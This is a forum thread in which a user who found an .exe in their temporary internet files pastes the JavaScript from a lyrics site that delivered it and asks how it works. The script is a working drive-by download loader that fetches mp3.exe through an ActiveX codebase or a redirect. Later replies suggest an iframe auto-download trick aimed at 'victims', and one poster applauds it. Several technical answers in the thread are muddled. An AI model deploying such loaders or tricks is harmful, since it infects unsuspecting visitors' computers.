ok the other day i was searching for some lyrics and my virus scanner (pcillin) went off saying it had detected a virus. i quickly took the appropriate action and quarantined the .exe that had made its way in my temporary internet files folder, and then i searched through the source of that page to try to find how i had actually downloaded it. correct me if im wrong but i think i found it. i highlighted it for you.






<script language=JavaScript>
// Change the line below to your EXE's PATH
var exepath='http://www.readlyrics.com/mp3.exe';

var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);

function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="ayb" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(jarpath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}

install();
</script>

so could that script i higlighted actually run the exe? or did it just auto download it to my temp internet files?


p.s. in case you were wondering it wasent even the lyrics i was looking for.....

hmm, sory, replied to wrong topic
ok, as far as I know, the <object> tag is used for Java applets, wich can be either client or server side.
normally one would place codebase = "." (for the path) and another param with the filename wich endsd with .class for the code.
This procedure however is also sued for objects in asp (but uses dll´s instead of .class files)

The .class files are downloaded to the client and then IE launches the init() method of the .class file.

However, since this is an .exe I am not sure wether this will be executed
(though it would always be better to just delete it as you did)

Of course it could, using ASPExec.

Hehe if there is a class file on that site, pull it off and give me a copy and Ill decompile it to the .java source. :)

Imp

But doesn't that script only work in Internet Explorer?
It's looks like it. (I know a good amount of JavaScript)

Can someone conform this? (if it's true then I really know IE sucks)

I doubt it was a virus, but you can't be too careful.
You can start an auto download in html by using IFrames, and just pointing the source to a .exe, and hope the "victim" has auto download and execute on ;) .

HA HA HA that's a great Method Degman!
I never thought of trying that.

Cool now I can make a site work like to pro sites do.